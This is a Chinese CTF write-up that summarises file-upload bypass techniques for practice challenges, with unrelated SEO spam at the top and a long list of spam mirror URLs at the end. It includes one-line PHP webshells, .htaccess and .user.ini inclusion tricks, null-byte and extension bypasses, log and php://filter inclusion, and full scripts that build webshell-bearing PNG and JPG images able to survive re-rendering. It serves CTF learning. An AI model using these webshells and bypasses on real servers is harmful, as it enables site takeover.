工信部网站备案查询步骤详解,0基础怎么学服装设计,wordpress商品分类,泰安网站建设培训归纳总结一下文件上传#xff08;其实是懒得写wp#xff09;
基于Dream ZHO师傅的CTF show 文件上传篇#xff08;web151-170#xff0c;看这一篇就够啦#xff09;-CSDN博客
和dota_st 师傅的ctfshow-Web1000题系列修炼(一) | dota_st
做一篇自己的总结 目录
一、什么… 归纳总结一下文件上传其实是懒得写wp
基于Dream ZHO师傅的CTF show 文件上传篇web151-170看这一篇就够啦-CSDN博客
和dota_st 师傅的ctfshow-Web1000题系列修炼(一) | dota_st
做一篇自己的总结 目录
一、什么是文件上传
木马文件
如何利用木马文件
二、文件上传绕过检测
无检测
js前端检测 1.bp抓包 2.更改js代码 3.直接浏览器ban掉js
MINE检测
黑名单绕过 .htaccess .user.ini好用
白名单绕过 00截断 图片马 getimagesize()绕过
三、木马绕过 短标签绕过 命令执行与文件包含
四、图片马的二次渲染 png jpg
五、小结 一、什么是文件上传 文件上传漏洞指服务端没有对用户上传的文件进行严格的过滤从而使用户可以上传木马文件控制整个网站。 那么什么是木马文件呢
木马文件 我们常见的木马就是一句话木马
?php eval($_POST[a]);? 在php中eval()函数的作用是可以将传入的参数当作命令执行 是用来防止报错的因为我们本身没有定义a变量这里本来不能使用a变量但是使代码可以继续执行下去不产生报错。 我也是个小萌新所以暂时也只知道这么一个常用来做题目的木马QAQ 一般写木马的时候需要关闭一下病毒防护不然你刚写完windows就把你写的文件给删了。 知道了什么是木马文件后我们还有两个问题要解决怎么传上去传上去之后该干嘛
怎么传上去就是本文的重点了所以先讲一下传上去以后该干嘛。
如何利用木马文件 因为是一个eval函数我们需要在网页里打开我们上传的.php文件一般打开之后是空白的
用的是BaseCTF_week1的upload题 然后我们有两种方式获取flag一种是通过POST传参数a进行命令执行一种是用蚁剑进行链接链接密码就是参数a。 注意一下不能用https协议。提一嘴py的request库也不能用https协议不知道为什么 那么知道了如何利用木马文件接下来就是本文的重头戏 二、文件上传绕过检测 无检测 咳咳故名思意就是没有检测随便上传php文件。上面那道upload就是无检测
js前端检测 也就是网页本身代码中存在检测后端没有检测这边大致有三种办法 1.bp抓包 我们把含有一句话木马的php文件后缀改为其他后缀如.txt然后上传之后用bp抓包截获这时我们可以更改后缀名改回php然后继续发送就可以发现绕过成功
例题ctfshow_web151 上传1.png文件里面写入一句话木马 把这个2.png改为2.php 下面那个Content-Type不用改这个是下一个知识点 2.更改js代码 因为前端检测不是要点这里给篇文章大家可以自行选择去看
渗透学习-学习记录-利用浏览器的开发者工具实时修改网页前端JS代码实现绕过_如何修改网页js-CSDN博客 3.直接浏览器ban掉js 简单粗暴这里也给个文章看看
各常用浏览器如何禁用js_浏览器禁用js-CSDN博客
MINE检测 这个就是刚刚提到的Content-Type Content-Type是指示发送端内容的媒体类型的 HTTP 头部广泛用于请求和响应中。 然后在php代码中可能存在这种代码
$type$_FILES[file][type];
$allowedImageTypes [
image/jpeg,
image/png,
image/gif,
image/bmp,
image/tiff,
image/webp
];
if(!in_array($type,$allowedImageTypes)){
echo scriptalert(只能允许上传图片)/script;
exit();
} 这样就是一个MIME检测 怎么绕过呢其实就是把Content-Type的值改为php检测可以通过的值就行比如.png.jpeg等等
例ctfshow_web152
这道题因为还有前端的存在所以还是要上传png然后就不用更改Content-Type的值虽然但是这道题目确实是这个考点。。 黑名单绕过 网站后端会过滤掉.php文件不让你上传这就是黑名单如何绕过呢 1.文件大小写过滤形如.pHp、.PhP等等 2.双写绕过形如.pphphp后端代码让连在一起的php替换成 。.pphphp替换之后就变成了.php 3.等价拓展名形如php2、.php3、.php4、.phps、.phtml 这里可以先传入.htaccess文件作用于Apache .htaccess 里面写上以下内容
AddType application/x-httpd-php .php .phtml 意思就是让.phtml像.php文件一样解析 同时也讲一下.user.ini文件 .user.ini好用 .user.ini 文件是 PHP 配置的用户级别配置文件允许在不修改全局 php.ini 配置文件的情况下对特定目录 或文件夹中的 PHP 设置进行调整。它主要用于在共享主机或没有对全局配置进行控制的环境中修改 PHP 配置。
auto_prepend_file1.png
include(1.png) 这个代码的作用就是可以执行1.png文件里的php代码。 在我们成功传上这串代码之后我们遍不需要苦心过滤php直接传png就行 当然题目很可能直接禁止这两个文件上传所以他们也不是万能的 例题ctfshow_web153 上传user.ini 还是只能上传图片文件这里要改成.png上传后改回来。 然后就可以上传一个jpg文件里面写上一句话木马。 这里证明一下是否成功我们链接蚁剑 额连蚁剑死活连不上看来别的师傅的wp才知道路径不能带上1.png这里提个醒 4.空格点号法 bp抓包后在.php后面加一个. .php. 或者加一个空格 .php 或者空格和.一起加后面跟php.php .php 白名单绕过 黑名单会过滤.php文件不允许php文件上传那么白名单就是只允许某类文件上传。 比如只允许.png文件上传 00截断 windows系统识别到文件名中00的时候将不再向后识别 仅适用于php版本小于5.3.4并且php的配置文件php.ini中的magic_quotes_gpc 的值需要修改为Off
get型上传php文件的话就在bp抓包的时候在顶部的.php后缀后面添加00 post型则需更改bp上传包的十六进制文本在文本里找到php后缀后面改为00 图片马 顾名思义就是图片木马在图片文件里添加一句话木马。 添加方法如下 010里在文件末尾添加一句话木马即可。 也可以在cmd里执行。虽然我没成功过
copy 1.jpg/b2.php 3.jpg 值得注意的是这种用法需要这个文件被包含了才有用否则跟真的上传一个图片没啥区别。 所以是需要万能的.user.ini的说白了和之前的绕过手法差不多 getimagesize()绕过 getimagesize(): 会对目标文件的16进制去进行一个读取去读取头几个字符串是不是符合图片的要求 所以我们在一句话木马前面加个GIF89a即可也不知道为什么
GIF89a
auto_prepend_file/tmp/sess_muma 三、木马绕过 什么木马也要绕过 因为后端可能会对php代码有锁过滤所以也需要学习一些绕过手法 短标签绕过
?eval($_POST[a]);? ban了php的话可以用短标签来代替原本的?php ? 命令执行与文件包含 有时候一句话木马会被ban这个时候我们可以上传一些命令比如
?system(ls);? 没错直接传命令也可以命令执行的知识点 命令执行知识点汇总-CSDN博客推销一下我自己 然后文件包含这里其实就是传的命令可以是一些伪协议
?includephp://filter/convert.base64-encode/resource../flag.php? 都到这里了php这种估计也被ban了这里可以通过ph.p.....的形式绕过 也可以日志注入?include/var/log/nginx/access.log? 日志里有会返回ua头的话就可以在ua里传入一句话木马 当然session注入条件竞争等等都可以在文件上传实现这里就不多讲了。
四、图片马的二次渲染 有些网站会对上传的图片进行二次处理会生成一个新的图片放到网页上 png 国外大牛写的png二次渲染脚本
?php
$p array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,0x66, 0x44, 0x50, 0x33);$img imagecreatetruecolor(32, 32);for ($y 0; $y sizeof($p); $y 3) {$r $p[$y];$g $p[$y1];$b $p[$y2];$color imagecolorallocate($img, $r, $g, $b);imagesetpixel($img, round($y / 3), 0, $color);
}imagepng($img,./1.png);
?
生成图片后上传然后命令执行即可 jpg 同样是国外大牛
?php/*The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().It is necessary that the size and quality of the initial image are the same as those of the processed image.1) Upload an arbitrary image via secured files upload script2) Save the processed image and launch:jpg_payload.php jpg_name.jpgIn case of successful injection you will get a specially crafted image, which should be uploaded again.Since the most straightforward injection method is used, the following problems can occur:1) After the second processing the injected data may become partially corrupted.2) The jpg_payload.php script outputs Somethings wrong.If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.Sergey Bobrov Black2Fan.See also:https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/*/$miniPayload ?eval($_POST[1]);?;if(!extension_loaded(gd) || !function_exists(imagecreatefromjpeg)) {die(php-gd is not installed);}if(!isset($argv[1])) {die(php jpg_payload.php jpg_name.jpg);}set_error_handler(custom_error_handler);for($pad 0; $pad 1024; $pad) {$nullbytePayloadSize $pad;$dis new DataInputStream($argv[1]);$outStream file_get_contents($argv[1]);$extraBytes 0;$correctImage TRUE;if($dis-readShort() ! 0xFFD8) {die(Incorrect SOI marker);}while((!$dis-eof()) ($dis-readByte() 0xFF)) {$marker $dis-readByte();$size $dis-readShort() - 2;$dis-skip($size);if($marker 0xDA) {$startPos $dis-seek();$outStreamTmp substr($outStream, 0, $startPos) . $miniPayload . str_repeat(\0,$nullbytePayloadSize) . substr($outStream, $startPos);checkImage(_.$argv[1], $outStreamTmp, TRUE);if($extraBytes ! 0) {while((!$dis-eof())) {if($dis-readByte() 0xFF) {if($dis-readByte ! 0x00) {break;}}}$stopPos $dis-seek() - 2;$imageStreamSize $stopPos - $startPos;$outStream substr($outStream, 0, $startPos) . $miniPayload . substr(str_repeat(\0,$nullbytePayloadSize).substr($outStream, $startPos, $imageStreamSize),0,$nullbytePayloadSize$imageStreamSize-$extraBytes) . substr($outStream, $stopPos);} elseif($correctImage) {$outStream $outStreamTmp;} else {break;}if(checkImage(payload_.$argv[1], $outStream)) {die(Success!);} else {break;}}}}unlink(payload_.$argv[1]);die(Something\s wrong);function checkImage($filename, $data, $unlink FALSE) {global $correctImage;file_put_contents($filename, $data);$correctImage TRUE;imagecreatefromjpeg($filename);if($unlink)unlink($filename);return $correctImage;}function custom_error_handler($errno, $errstr, $errfile, $errline) {global $extraBytes, $correctImage;$correctImage FALSE;if(preg_match(/(\d) extraneous bytes before marker/, $errstr, $m)) {if(isset($m[1])) {$extraBytes (int)$m[1];}}}class DataInputStream {private $binData;private $order;private $size;public function __construct($filename, $order false, $fromString false) {$this-binData ;$this-order $order;if(!$fromString) {if(!file_exists($filename) || !is_file($filename))die(File not exists [.$filename.]);$this-binData file_get_contents($filename);} else {$this-binData $filename;}$this-size strlen($this-binData);}public function seek() {return ($this-size - strlen($this-binData));}public function skip($skip) {$this-binData substr($this-binData, $skip);}public function readByte() {if($this-eof()) {die(End Of File);}$byte substr($this-binData, 0, 1);$this-binData substr($this-binData, 1);return ord($byte);}public function readShort() {if(strlen($this-binData) 2) {die(End Of File);}$short substr($this-binData, 0, 2);$this-binData substr($this-binData, 2);if($this-order) {$short (ord($short[1]) 8) ord($short[0]);} else {$short (ord($short[0]) 8) ord($short[1]);}return $short;}public function eof() {return !$this-binData||(strlen($this-binData) 0);}}
? 我们需要先上传一个正常的图片让他渲染一次 然后把渲染后的图片和php代码一起执行 Linux里以这个形式 “php 脚本文件 图片文件” 成功后再次上传然后命令执行即可。
五、小结 本来想每个知识点都添加例题的但是篇幅实在是有点长最后还有一个木马免杀部分没有写我暂时也不是很清楚之后会添加在文章里面那么文件上传知识点就汇总到这。 文章转载自: http://www.morning.jmtrq.cn.gov.cn.jmtrq.cn http://www.morning.xbmwm.cn.gov.cn.xbmwm.cn http://www.morning.pcgjj.cn.gov.cn.pcgjj.cn http://www.morning.wwdlg.cn.gov.cn.wwdlg.cn http://www.morning.prprz.cn.gov.cn.prprz.cn http://www.morning.mlffg.cn.gov.cn.mlffg.cn http://www.morning.pwmpn.cn.gov.cn.pwmpn.cn http://www.morning.zrmxp.cn.gov.cn.zrmxp.cn http://www.morning.zbkwj.cn.gov.cn.zbkwj.cn http://www.morning.ymhzd.cn.gov.cn.ymhzd.cn http://www.morning.kryxk.cn.gov.cn.kryxk.cn http://www.morning.dbcw.cn.gov.cn.dbcw.cn http://www.morning.wxfgg.cn.gov.cn.wxfgg.cn http://www.morning.rgxn.cn.gov.cn.rgxn.cn http://www.morning.qxxj.cn.gov.cn.qxxj.cn http://www.morning.cmcjp.cn.gov.cn.cmcjp.cn http://www.morning.jcrlx.cn.gov.cn.jcrlx.cn http://www.morning.xpmwt.cn.gov.cn.xpmwt.cn http://www.morning.zrjzc.cn.gov.cn.zrjzc.cn http://www.morning.hqlnp.cn.gov.cn.hqlnp.cn http://www.morning.wtnyg.cn.gov.cn.wtnyg.cn http://www.morning.xkjqg.cn.gov.cn.xkjqg.cn http://www.morning.bhxzx.cn.gov.cn.bhxzx.cn http://www.morning.fmqng.cn.gov.cn.fmqng.cn http://www.morning.lgtcg.cn.gov.cn.lgtcg.cn http://www.morning.rcgzg.cn.gov.cn.rcgzg.cn http://www.morning.kztts.cn.gov.cn.kztts.cn http://www.morning.yrmpz.cn.gov.cn.yrmpz.cn http://www.morning.qftzk.cn.gov.cn.qftzk.cn http://www.morning.cfjyr.cn.gov.cn.cfjyr.cn http://www.morning.yzxlkj.com.gov.cn.yzxlkj.com http://www.morning.qynnw.cn.gov.cn.qynnw.cn http://www.morning.dgpxp.cn.gov.cn.dgpxp.cn http://www.morning.svtxeu.com.gov.cn.svtxeu.com http://www.morning.ywpwq.cn.gov.cn.ywpwq.cn http://www.morning.yswxq.cn.gov.cn.yswxq.cn http://www.morning.rksnk.cn.gov.cn.rksnk.cn http://www.morning.wrlff.cn.gov.cn.wrlff.cn http://www.morning.gkmwx.cn.gov.cn.gkmwx.cn http://www.morning.rmyt.cn.gov.cn.rmyt.cn http://www.morning.thlr.cn.gov.cn.thlr.cn http://www.morning.gpryk.cn.gov.cn.gpryk.cn http://www.morning.zkqsc.cn.gov.cn.zkqsc.cn http://www.morning.dwgcx.cn.gov.cn.dwgcx.cn http://www.morning.fkdts.cn.gov.cn.fkdts.cn http://www.morning.pqqzd.cn.gov.cn.pqqzd.cn http://www.morning.jhqcr.cn.gov.cn.jhqcr.cn http://www.morning.cknsx.cn.gov.cn.cknsx.cn http://www.morning.qpsdq.cn.gov.cn.qpsdq.cn http://www.morning.nxwk.cn.gov.cn.nxwk.cn http://www.morning.zfzgp.cn.gov.cn.zfzgp.cn http://www.morning.hsrch.cn.gov.cn.hsrch.cn http://www.morning.bsbcp.cn.gov.cn.bsbcp.cn http://www.morning.prznc.cn.gov.cn.prznc.cn http://www.morning.cytr.cn.gov.cn.cytr.cn http://www.morning.qlpq.cn.gov.cn.qlpq.cn http://www.morning.bqfpm.cn.gov.cn.bqfpm.cn http://www.morning.pjtw.cn.gov.cn.pjtw.cn http://www.morning.phzrq.cn.gov.cn.phzrq.cn http://www.morning.cwqrj.cn.gov.cn.cwqrj.cn http://www.morning.kyfrl.cn.gov.cn.kyfrl.cn http://www.morning.jzkqg.cn.gov.cn.jzkqg.cn http://www.morning.dygqq.cn.gov.cn.dygqq.cn http://www.morning.ltqzq.cn.gov.cn.ltqzq.cn http://www.morning.txqgd.cn.gov.cn.txqgd.cn http://www.morning.yjdql.cn.gov.cn.yjdql.cn http://www.morning.pljdy.cn.gov.cn.pljdy.cn http://www.morning.rbmnq.cn.gov.cn.rbmnq.cn http://www.morning.dmtwz.cn.gov.cn.dmtwz.cn http://www.morning.nqwz.cn.gov.cn.nqwz.cn http://www.morning.mjbkp.cn.gov.cn.mjbkp.cn http://www.morning.plxhq.cn.gov.cn.plxhq.cn http://www.morning.phzrq.cn.gov.cn.phzrq.cn http://www.morning.sxmbk.cn.gov.cn.sxmbk.cn http://www.morning.fbmrz.cn.gov.cn.fbmrz.cn http://www.morning.rdgb.cn.gov.cn.rdgb.cn http://www.morning.wqrk.cn.gov.cn.wqrk.cn http://www.morning.qphcq.cn.gov.cn.qphcq.cn http://www.morning.lxmks.cn.gov.cn.lxmks.cn http://www.morning.rtkz.cn.gov.cn.rtkz.cn
